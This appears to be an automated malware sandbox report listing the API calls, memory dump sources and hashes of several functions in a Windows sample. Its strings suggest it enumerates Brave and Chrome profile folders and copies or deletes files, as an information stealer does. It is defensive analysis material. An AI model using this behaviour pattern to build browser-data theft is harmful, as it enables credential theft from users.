                        • Instruction ID: 4e3d0869397ea445dae63e145aaa7f9f2269ce447874493ca172c61316c1831f
                        • Opcode Fuzzy Hash: 8cf193d0708492dbdce95b81538e7686fc0002efe7d7e8955ccfa7693ec69c23
                        • Instruction Fuzzy Hash: 7001D672A44258ABD720CF99EC45BADFBB8F745B21F00426AFA19E3780D778590087A5

                        Non-executed Functions

                        Function 00502390 Relevance: 223.6, APIs: 126, Strings: 1, Instructions: 1308stringfileCOMMON
                        Download Yara Rule
                        APIs
                        • lstrcpy.KERNEL32(00000000,0051CFEC), ref: 005023D4
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 005023F7
                        • lstrcat.KERNEL32(00000000,00000000), ref: 00502402
                        • lstrlen.KERNEL32(\*.*), ref: 0050240D
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0050242A
                        • lstrcat.KERNEL32(00000000,\*.*), ref: 00502436
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0050246A
                        • FindFirstFileA.KERNEL32(00000000,?), ref: 00502486
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1500474908.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                        • Associated: 00000000.00000002.1500446413.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000527000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.000000000057E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000586000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.000000000059F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000728000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500665640.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.000000000073C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000008C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500960257.00000000009EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1501084226.0000000000B8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1501104498.0000000000B90000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
                        • String ID: \*.*
                        • API String ID: 2567437900-1173974218
                        • Opcode ID: 243d5e643c9a66739d39c35b627d99de133bbf4bcb597f85b80fc2b8e42beb6a
                        • Instruction ID: 61834096e1905f3b912e832a0b554bc3c49aaa6c40e0557af1514b17efd7cd9b
                        • Opcode Fuzzy Hash: 243d5e643c9a66739d39c35b627d99de133bbf4bcb597f85b80fc2b8e42beb6a
                        • Instruction Fuzzy Hash: EDA2B570A0161A9BDB31AF75DD8DAAF7BB8FF04704F088029B905D7291DB78DD428B58
                        Function 004F16A0 Relevance: 202.4, APIs: 114, Strings: 1, Instructions: 1164stringfileCOMMON
                        Download Yara Rule
                        APIs
                        • lstrcpy.KERNEL32(00000000,0051CFEC), ref: 004F16E2
                        • lstrcpy.KERNEL32(00000000,0051CFEC), ref: 004F1719
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 004F176C
                        • lstrcat.KERNEL32(00000000), ref: 004F1776
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 004F17A2
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 004F17EF
                        • lstrcat.KERNEL32(00000000,00000000), ref: 004F17F9
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 004F1825
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 004F1875
                        • lstrcat.KERNEL32(00000000), ref: 004F187F
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 004F18AB
                        • lstrcpy.KERNEL32(00000000,?), ref: 004F18F3
                        • lstrcat.KERNEL32(00000000,00000000), ref: 004F18FE
                        • lstrlen.KERNEL32(00521794), ref: 004F1909
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 004F1929
                        • lstrcat.KERNEL32(00000000,00521794), ref: 004F1935
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 004F195B
                        • lstrcat.KERNEL32(00000000,00000000), ref: 004F1966
                        • lstrlen.KERNEL32(\*.*), ref: 004F1971
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 004F198E
                        • lstrcat.KERNEL32(00000000,\*.*), ref: 004F199A
                          • Part of subcall function 00514040: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,00000000), ref: 0051406D
                          • Part of subcall function 00514040: lstrcpy.KERNEL32(00000000,?), ref: 005140A2
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 004F19C3
                        • lstrcpy.KERNEL32(00000000,?), ref: 004F1A0E
                        • lstrcat.KERNEL32(00000000,00000000), ref: 004F1A16
                        • lstrlen.KERNEL32(00521794), ref: 004F1A21
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 004F1A41
                        • lstrcat.KERNEL32(00000000,00521794), ref: 004F1A4D
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 004F1A76
                        • lstrcat.KERNEL32(00000000,00000000), ref: 004F1A81
                        • lstrlen.KERNEL32(00521794), ref: 004F1A8C
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 004F1AAC
                        • lstrcat.KERNEL32(00000000,00521794), ref: 004F1AB8
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 004F1ADE
                        • lstrcat.KERNEL32(00000000,00000000), ref: 004F1AE9
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 004F1B11
                        • FindFirstFileA.KERNEL32(00000000,?), ref: 004F1B45
                        • StrCmpCA.SHLWAPI(?,005217A0), ref: 004F1B70
                        • StrCmpCA.SHLWAPI(?,005217A4), ref: 004F1B8A
                        • lstrcpy.KERNEL32(00000000,0051CFEC), ref: 004F1BC4
                        • lstrcpy.KERNEL32(00000000,?), ref: 004F1BFB
                        • lstrcat.KERNEL32(00000000,00000000), ref: 004F1C03
                        • lstrlen.KERNEL32(00521794), ref: 004F1C0E
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 004F1C31
                        • lstrcat.KERNEL32(00000000,00521794), ref: 004F1C3D
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 004F1C69
                        • lstrcat.KERNEL32(00000000,00000000), ref: 004F1C74
                        • lstrlen.KERNEL32(00521794), ref: 004F1C7F
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 004F1CA2
                        • lstrcat.KERNEL32(00000000,00521794), ref: 004F1CAE
                        • lstrlen.KERNEL32(?), ref: 004F1CBB
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 004F1CDB
                        • lstrcat.KERNEL32(00000000,?), ref: 004F1CE9
                        • lstrlen.KERNEL32(00521794), ref: 004F1CF4
                        • lstrcpy.KERNEL32(00000000,?), ref: 004F1D14
                        • lstrcat.KERNEL32(00000000,00521794), ref: 004F1D20
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 004F1D46
                        • lstrcat.KERNEL32(00000000,00000000), ref: 004F1D51
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 004F1D7D
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 004F1DE0
                        • lstrcat.KERNEL32(00000000,00000000), ref: 004F1DEB
                        • lstrlen.KERNEL32(00521794), ref: 004F1DF6
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 004F1E19
                        • lstrcat.KERNEL32(00000000,00521794), ref: 004F1E25
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 004F1E4B
                        • lstrcat.KERNEL32(00000000,00000000), ref: 004F1E56
                        • lstrlen.KERNEL32(00521794), ref: 004F1E61
                        • lstrcpy.KERNEL32(00000000,?), ref: 004F1E81
                        • lstrcat.KERNEL32(00000000,00521794), ref: 004F1E8D
                        • lstrlen.KERNEL32(?), ref: 004F1E9A
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 004F1EBA
                        • lstrcat.KERNEL32(00000000,?), ref: 004F1EC8
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 004F1EF4
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 004F1F3E
                        • GetFileAttributesA.KERNEL32(00000000), ref: 004F1F45
                        • lstrcpy.KERNEL32(00000000,0051CFEC), ref: 004F1F9F
                        • lstrlen.KERNEL32(01038A70), ref: 004F1FAE
                        • lstrcpy.KERNEL32(00000000,?), ref: 004F1FDB
                        • lstrcat.KERNEL32(00000000,?), ref: 004F1FE3
                        • lstrlen.KERNEL32(00521794), ref: 004F1FEE
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 004F200E
                        • lstrcat.KERNEL32(00000000,00521794), ref: 004F201A
                        • lstrcpy.KERNEL32(00000000,?), ref: 004F2042
                        • lstrcat.KERNEL32(00000000,00000000), ref: 004F204D
                        • lstrlen.KERNEL32(00521794), ref: 004F2058
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 004F2075
                        • lstrcat.KERNEL32(00000000,00521794), ref: 004F2081
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1500474908.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                        • Associated: 00000000.00000002.1500446413.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000527000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.000000000057E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000586000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.000000000059F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000728000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500665640.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.000000000073C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000008C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500960257.00000000009EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1501084226.0000000000B8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1501104498.0000000000B90000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$lstrcat$lstrlen$File$AttributesFindFirstFolderPath
                        • String ID: \*.*
                        • API String ID: 4127656590-1173974218
                        • Opcode ID: 7711b87abe5494c231dc44aaa640a907177ed9bca8275ad80ec57e031dbe1520
                        • Instruction ID: 81f4f212b07a3bd0f0fdbe41813a352b24522c2db72c460269295824251ea942
                        • Opcode Fuzzy Hash: 7711b87abe5494c231dc44aaa640a907177ed9bca8275ad80ec57e031dbe1520
                        • Instruction Fuzzy Hash: 9B928571A0121EDBDB21AF65DE85ABF77B9EF40704F044026FA05A7261DB7CDD028B98
                        Function 004FDB80 Relevance: 176.2, APIs: 96, Strings: 4, Instructions: 1193stringfileCOMMON
                        Download Yara Rule
                        APIs
                        • lstrcpy.KERNEL32(00000000,0051CFEC), ref: 004FDBC1
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 004FDBE4
                        • lstrcat.KERNEL32(00000000,00000000), ref: 004FDBEF
                        • lstrlen.KERNEL32(00524CA8), ref: 004FDBFA
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 004FDC17
                        • lstrcat.KERNEL32(00000000,00524CA8), ref: 004FDC23
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 004FDC4C
                        • lstrcpy.KERNEL32(00000000,0051CFEC), ref: 004FDC8F
                        • lstrcpy.KERNEL32(00000000,0051CFEC), ref: 004FDCBF
                        • FindFirstFileA.KERNEL32(00000000,?), ref: 004FDCD0
                        • StrCmpCA.SHLWAPI(?,005217A0), ref: 004FDCF0
                        • StrCmpCA.SHLWAPI(?,005217A4), ref: 004FDD0A
                        • lstrlen.KERNEL32(0051CFEC), ref: 004FDD1D
                        • lstrcpy.KERNEL32(00000000,0051CFEC), ref: 004FDD47
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 004FDD70
                        • lstrcat.KERNEL32(00000000,00000000), ref: 004FDD7B
                        • lstrlen.KERNEL32(00521794), ref: 004FDD86
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 004FDDA3
                        • lstrcat.KERNEL32(00000000,00521794), ref: 004FDDAF
                        • lstrlen.KERNEL32(?), ref: 004FDDBC
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 004FDDDF
                        • lstrcat.KERNEL32(00000000,?), ref: 004FDDED
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 004FDE19
                        • lstrlen.KERNEL32(00521794), ref: 004FDE3D
                        • lstrcpy.KERNEL32(00000000,?), ref: 004FDE6F
                        • lstrcat.KERNEL32(00000000,00521794), ref: 004FDE7B
                        • lstrlen.KERNEL32(010388F0), ref: 004FDE8A
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 004FDEB0
                        • lstrcat.KERNEL32(00000000,00000000), ref: 004FDEBB
                        • lstrlen.KERNEL32(00521794), ref: 004FDEC6
                        • lstrcpy.KERNEL32(00000000,?), ref: 004FDEE6
                        • lstrcat.KERNEL32(00000000,00521794), ref: 004FDEF2
                        • lstrlen.KERNEL32(01038A40), ref: 004FDF01
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 004FDF27
                        • lstrcat.KERNEL32(00000000,00000000), ref: 004FDF32
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 004FDF5E
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 004FDFA5
                        • lstrcat.KERNEL32(00000000,00521794), ref: 004FDFB1
                        • lstrlen.KERNEL32(010388F0), ref: 004FDFC0
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 004FDFE9
                        • lstrcat.KERNEL32(00000000,00000000), ref: 004FDFF4
                        • lstrlen.KERNEL32(00521794), ref: 004FDFFF
                        • lstrcpy.KERNEL32(00000000,?), ref: 004FE022
                        • lstrcat.KERNEL32(00000000,00521794), ref: 004FE02E
                        • lstrlen.KERNEL32(01038A40), ref: 004FE03D
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 004FE063
                        • lstrcat.KERNEL32(00000000,00000000), ref: 004FE06E
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 004FE09A
                        • StrCmpCA.SHLWAPI(?,Brave), ref: 004FE0CD
                        • StrCmpCA.SHLWAPI(?,Preferences), ref: 004FE0E7
                        • lstrcpy.KERNEL32(00000000,0051CFEC), ref: 004FE11F
                        • lstrlen.KERNEL32(0103D010), ref: 004FE12E
                        • lstrcpy.KERNEL32(00000000,?), ref: 004FE155
                        • lstrcat.KERNEL32(00000000,?), ref: 004FE15D
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 004FE19F
                        • lstrcat.KERNEL32(00000000), ref: 004FE1A9
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 004FE1D0
                        • CopyFileA.KERNEL32(00000000,?,00000001), ref: 004FE1F9
                        • lstrcpy.KERNEL32(00000000,0051CFEC), ref: 004FE22F
                        • lstrlen.KERNEL32(01038A70), ref: 004FE23D
                        • lstrcpy.KERNEL32(00000000,?), ref: 004FE261
                        • lstrcat.KERNEL32(00000000,01038A70), ref: 004FE269
                        • lstrlen.KERNEL32(\Brave\Preferences), ref: 004FE274
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 004FE29B
                        • lstrcat.KERNEL32(00000000,\Brave\Preferences), ref: 004FE2A7
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 004FE2CF
                        • lstrcpy.KERNEL32(00000000,?), ref: 004FE30F
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 004FE349
                        • DeleteFileA.KERNEL32(?), ref: 004FE381
                        • StrCmpCA.SHLWAPI(?,0103D070), ref: 004FE3AB
                        • lstrcpy.KERNEL32(00000000,?), ref: 004FE3F4
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 004FE41C
                        • lstrcpy.KERNEL32(00000000,?), ref: 004FE445
                        • StrCmpCA.SHLWAPI(?,01038A40), ref: 004FE468
                        • StrCmpCA.SHLWAPI(?,010388F0), ref: 004FE47D
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 004FE4D9
                        • GetFileAttributesA.KERNEL32(00000000), ref: 004FE4E0
                        • StrCmpCA.SHLWAPI(?,0103D028), ref: 004FE58E
                        • lstrcpy.KERNEL32(00000000,0051CFEC), ref: 004FE5C4
                        • CopyFileA.KERNEL32(00000000,?,00000001), ref: 004FE639
                        • lstrcpy.KERNEL32(00000000,?), ref: 004FE678
                        • lstrcpy.KERNEL32(00000000,?), ref: 004FE6A1
                        • lstrcpy.KERNEL32(00000000,?), ref: 004FE6C7
                        • lstrcpy.KERNEL32(00000000,?), ref: 004FE70E
                        • lstrcpy.KERNEL32(00000000,?), ref: 004FE737
                        • lstrcpy.KERNEL32(00000000,?), ref: 004FE75C
                        • StrCmpCA.SHLWAPI(?,Google Chrome), ref: 004FE776
                        • DeleteFileA.KERNEL32(?), ref: 004FE7D2
                        • StrCmpCA.SHLWAPI(?,01038BA0), ref: 004FE7FC
                        • lstrcpy.KERNEL32(00000000,?), ref: 004FE88C
                        • lstrcpy.KERNEL32(00000000,?), ref: 004FE8B5
                        • lstrcpy.KERNEL32(00000000,?), ref: 004FE8EE
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 004FE916
                        • lstrcpy.KERNEL32(00000000,?), ref: 004FE952
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1500474908.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                        • Associated: 00000000.00000002.1500446413.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000527000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.000000000057E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000586000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.000000000059F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000728000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500665640.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.000000000073C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000008C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500960257.00000000009EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1501084226.0000000000B8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1501104498.0000000000B90000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$lstrcat$lstrlen$File$CopyDelete$AttributesFindFirst
                        • String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
                        • API String ID: 2635522530-726946144
                        • Opcode ID: 918b99af38b05711493eb8a3d5d39eeab76184b486c8580a537399e7a658fb46
                        • Instruction ID: 2038e71f5a99180e379baf7b2afffc0d652658929395628b7bac70d5d9a42d28
                        • Opcode Fuzzy Hash: 918b99af38b05711493eb8a3d5d39eeab76184b486c8580a537399e7a658fb46
                        • Instruction Fuzzy Hash: 3992A571A0020E9BDB20EF66DD89ABF77B9AF44304F04452AFA0597350DB7CDC468B99
                        Function 005018A0 Relevance: 156.7, APIs: 88, Strings: 1, Instructions: 909stringfileCOMMON
                        Download Yara Rule
                        APIs
                        • lstrcpy.KERNEL32(00000000,0051CFEC), ref: 005018D2
                        • lstrlen.KERNEL32(\*.*), ref: 005018DD
                        • lstrcpy.KERNEL32(00000000,?), ref: 005018FF
                        • lstrcat.KERNEL32(00000000,\*.*), ref: 0050190B
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00501932
                        • FindFirstFileA.KERNEL32(00000000,?), ref: 00501947
                        • StrCmpCA.SHLWAPI(?,005217A0), ref: 00501967
                        • StrCmpCA.SHLWAPI(?,005217A4), ref: 00501981
                        • lstrcpy.KERNEL32(00000000,0051CFEC), ref: 005019BF
                        • lstrcpy.KERNEL32(00000000,0051CFEC), ref: 005019F2
                        • lstrcpy.KERNEL32(00000000,?), ref: 00501A1A
                        • lstrcat.KERNEL32(00000000,00000000), ref: 00501A25
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00501A4C
                        • lstrlen.KERNEL32(00521794), ref: 00501A5E
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00501A80
                        • lstrcat.KERNEL32(00000000,00521794), ref: 00501A8C
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00501AB4
                        • lstrlen.KERNEL32(?), ref: 00501AC8
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00501AE5
                        • lstrcat.KERNEL32(00000000,?), ref: 00501AF3
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00501B19
                        • lstrlen.KERNEL32(01038B10), ref: 00501B2F
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00501B59
                        • lstrcat.KERNEL32(00000000,00000000), ref: 00501B64
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00501B8F
                        • lstrlen.KERNEL32(00521794), ref: 00501BA1
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00501BC3
                        • lstrcat.KERNEL32(00000000,00521794), ref: 00501BCF
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00501BF8
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00501C25
                        • lstrcat.KERNEL32(00000000,00000000), ref: 00501C30
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00501C57
                        • lstrlen.KERNEL32(00521794), ref: 00501C69
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00501C8B
                        • lstrcat.KERNEL32(00000000,00521794), ref: 00501C97
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00501CC0
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00501CEF
                        • lstrcat.KERNEL32(00000000,00000000), ref: 00501CFA
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00501D21
                        • lstrlen.KERNEL32(00521794), ref: 00501D33
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00501D55
                        • lstrcat.KERNEL32(00000000,00521794), ref: 00501D61
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00501D8A
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00501DB9
                        • lstrcat.KERNEL32(00000000,00000000), ref: 00501DC4
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00501DED
                        • lstrlen.KERNEL32(00521794), ref: 00501E19
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00501E36
                        • lstrcat.KERNEL32(00000000,00521794), ref: 00501E42
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00501E68
                        • lstrlen.KERNEL32(0103CF80), ref: 00501E7E
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00501EB2
                        • lstrlen.KERNEL32(00521794), ref: 00501EC6
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00501EE3
                        • lstrcat.KERNEL32(00000000,00521794), ref: 00501EEF
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00501F15
                        • lstrlen.KERNEL32(0103D328), ref: 00501F2B
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00501F5F
                        • lstrlen.KERNEL32(00521794), ref: 00501F73
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00501F90
                        • lstrcat.KERNEL32(00000000,00521794), ref: 00501F9C
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00501FC2
                        • lstrlen.KERNEL32(0102B220), ref: 00501FD8
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00502000
                        • lstrcat.KERNEL32(00000000,00000000), ref: 0050200B
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00502036
                        • lstrlen.KERNEL32(00521794), ref: 00502048
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00502067
                        • lstrcat.KERNEL32(00000000,00521794), ref: 00502073
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00502098
                        • lstrlen.KERNEL32(?), ref: 005020AC
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 005020D0
                        • lstrcat.KERNEL32(00000000,?), ref: 005020DE
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00502103
                        • lstrcpy.KERNEL32(00000000,0051CFEC), ref: 0050213F
                        • lstrlen.KERNEL32(0103D010), ref: 0050214E
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00502176
                        • lstrcat.KERNEL32(00000000,00000000), ref: 00502181
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1500474908.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                        • Associated: 00000000.00000002.1500446413.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000527000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.000000000057E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000586000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.000000000059F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000728000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500665640.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.000000000073C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000008C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500960257.00000000009EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1501084226.0000000000B8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1501104498.0000000000B90000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$lstrcat$lstrlen$FileFindFirst
                        • String ID: \*.*
                        • API String ID: 712834838-1173974218
                        • Opcode ID: 877281517e51bbfb3c4e3b59621542dcc11905e1a84633ae475a4545b9767661
                        • Instruction ID: 0b04cb3c0794b3e18e8bb161b638c3a6600712c10c36a22dfd24c3fdec7f28e2
                        • Opcode Fuzzy Hash: 877281517e51bbfb3c4e3b59621542dcc11905e1a84633ae475a4545b9767661
                        • Instruction Fuzzy Hash: DA62A331A11A1A9BCB31AF65CD49ABF7BB9FF40704F084029F90597291DB78DD02CB99
                        Function 00503910 Relevance: 144.4, APIs: 81, Strings: 1, Instructions: 869stringfileCOMMON
                        Download Yara Rule
                        APIs
                        • wsprintfA.USER32 ref: 0050392C
                        • FindFirstFileA.KERNEL32(?,?), ref: 00503943
                        • StrCmpCA.SHLWAPI(?,005217A0), ref: 0050396C
